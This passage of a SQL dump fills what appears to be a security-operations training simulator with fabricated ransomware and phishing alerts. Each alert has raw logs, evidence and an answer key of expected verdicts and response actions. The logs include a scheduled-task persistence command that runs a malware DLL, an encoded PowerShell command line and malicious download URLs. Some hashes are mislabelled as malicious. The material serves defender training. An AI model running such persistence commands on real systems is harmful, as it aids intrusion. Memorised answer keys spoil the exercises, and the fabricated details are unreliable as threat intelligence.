4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1577, 'Phishing Email Detected', 'high', 'Email Security Gateway Logs', 'A spear-phishing email targeting healthcare employees was detected. The email contained a malicious link aiming to harvest credentials and gain unauthorized access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:45Z\",\"source_ip\":\"203.0.113.50\",\"destination_ip\":\"10.1.2.3\",\"email_subject\":\"Urgent: Verify your account credentials\",\"email_from\":\"security-notice@legithealthcare.com\",\"email_to\":\"jdoe@healthcare-facility.com\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_url\":\"http://malicious-login.com/verify\",\"detected_by\":\"Email Security Gateway\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of healthcare facility.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"security-notice@legithealthcare.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address used in recent phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Database\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis 
Service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious PDF files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.600Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1578, 'Malicious Macro Execution', 'critical', 'Endpoint Detection and Response (EDR)', 'A malicious macro was executed in a document attachment, deploying ransomware payload onto the system. This is step 2 in the operation, following credential compromise.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"macro_execution\",\"device_id\":\"EDR-123456\",\"user\":\"j.doe@company.com\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.55\",\"document_name\":\"Quarterly_Report_Q3.docm\",\"macro_hash\":\"e9f8f88a5c8b9d3b9e6f1e4b7c3d2a1f\",\"ransomware_name\":\"NoEscape\",\"process_id\":4521,\"endpoint\":\"WIN-8PQEKC1ABCD\",\"action\":\"macro_enabled\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\Quarterly_Report_Q3.docm\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9f8f88a5c8b9d3b9e6f1e4b7c3d2a1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NoEscape ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Quarterly_Report_Q3.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Document file with macro execution log.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1579, 'Persistence via Scheduled Task', 'high', 'Windows Event Logs', 'NoEscape ransomware has set up a scheduled task to maintain persistence across system reboots, ensuring the malware remains active and undetected for long-term access.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"EventID\":4698,\"ProviderName\":\"Microsoft-Windows-TaskScheduler\",\"LogName\":\"Security\",\"RecordID\":1184523,\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\NoEscape\\\\DailyCheck\",\"TaskContent\":\"schtasks.exe /create /tn \\\\Microsoft\\\\Windows\\\\NoEscape\\\\DailyCheck /tr \\\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\Public\\\\Documents\\\\malware.dll,Execute\\\" /sc daily /st 14:00\",\"User\":\"SYSTEM\",\"Computer\":\"compromised-host.local\",\"IPAddress\":\"10.0.5.23\",\"Hash\":\"5d41402abc4b2a76b9719d911017c592\",\"ExternalAttackerIP\":\"203.0.113.45\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known NoEscape ransomware DLL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 
14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 
14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1580, 'SMB Protocol Exploitation', 'critical', 'Network Traffic Analysis', 'Exploiting vulnerabilities in SMB protocols, the NoEscape ransomware moves laterally within the healthcare network, encrypting critical files on multiple systems to maximize impact.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"protocol\":\"SMB\",\"username\":\"john_doe\",\"file_accessed\":\"\\\\\\\\10.0.5.23\\\\shared\\\\critical_patient_records.xlsx\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"file_encryption_attempt\",\"alert_id\":\"ALERT-20231015-0001\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with NoEscape ransomware activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the healthcare network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NoEscape ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1581, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Alerts', 'In the final stage of the operation, NoEscape has successfully exfiltrated sensitive patient records to their command and control servers. These records are intended for ransom demands.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"exfiltrated_files\":[\"patient_records_2023.zip\",\"confidential_data.csv\"],\"file_hashes\":[\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\",\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\"],\"c2_domain\":\"maliciousserver.com\",\"alert_id\":\"DLP-EXFIL-005\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server involved in ransomware activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated patient records.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated confidential data.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"maliciousserver.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DomainTools\",\"verdict\":\"malicious\",\"details\":\"Domain used for command and control operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.612Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"patient_records_2023.zip\\\",\\\"confidential_data.csv\\\"],\\\"file_hashes\\\":[\\\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\\\",\\\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\\\"],\\\"c2_domain\\\":\\\"maliciousserver.com\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.612Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"patient_records_2023.zip\\\",\\\"confidential_data.csv\\\"],\\\"file_hashes\\\":[\\\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\\\",\\\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\\\"],\\\"c2_domain\\\":\\\"maliciousserver.com\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.612Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"patient_records_2023.zip\\\",\\\"confidential_data.csv\\\"],\\\"file_hashes\\\":[\\\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\\\",\\\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\\\"],\\\"c2_domain\\\":\\\"maliciousserver.com\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.612Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"patient_records_2023.zip\\\",\\\"confidential_data.csv\\\"],\\\"file_hashes\\\":[\\\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\\\",\\\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\\\"],\\\"c2_domain\\\":\\\"maliciousserver.com\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.612Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"patient_records_2023.zip\\\",\\\"confidential_data.csv\\\"],\\\"file_hashes\\\":[\\\"3a5d5c89f8e345c6b29c2e8d7e0f9d3e\\\",\\\"b1d2a5c9e6a3b5f8d9c2a7e8d5f2b4c3\\\"],\\\"c2_domain\\\":\\\"maliciousserver.com\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1582, 'Suspicious Download from Known Malicious Domain', 'medium', 'Network Traffic Analysis', 'A user was tricked into downloading a file from a known malicious domain associated with Ragnar Locker. This file is suspected to be the initial access point for further infiltration.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_domain\":\"malicious-downloads.com\",\"filename\":\"invoice_update.exe\",\"file_hash\":\"3f4f7b1c2d5e2b9b0c6f8b3a1e4d5f3c\",\"user\":\"jdoe\",\"url\":\"http://malicious-downloads.com/invoice_update.exe\"}', '2026-03-15 19:16:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user who initiated the download.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_blacklist\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-downloads.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Domain known for hosting malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing and malware distribution.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f4f7b1c2d5e2b9b0c6f8b3a1e4d5f3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware 
sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1583, 'Execution of Virtual Machine with Malicious Intent', 'high', 'Endpoint Detection and Response (EDR)', 'The downloaded file executed a virtual machine, hiding the ransomware execution from standard security solutions. The activity was detected by the EDR as an anomaly due to the launch of a non-standard virtual machine with suspicious network behavior.', 'Execution', 'T1059.006', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"EVT-20231015-0002\",\"source\":\"EDR\",\"event_type\":\"execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"DESKTOP-1234XYZ\",\"process_name\":\"vmware.exe\",\"process_id\":4321,\"username\":\"john_doe\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\malicious_vm.vmx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"network_activity\":{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\"},\"suspicious_behavior\":\"Execution of a virtual machine with a known malicious hash\"}', '2026-03-15 19:16:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup 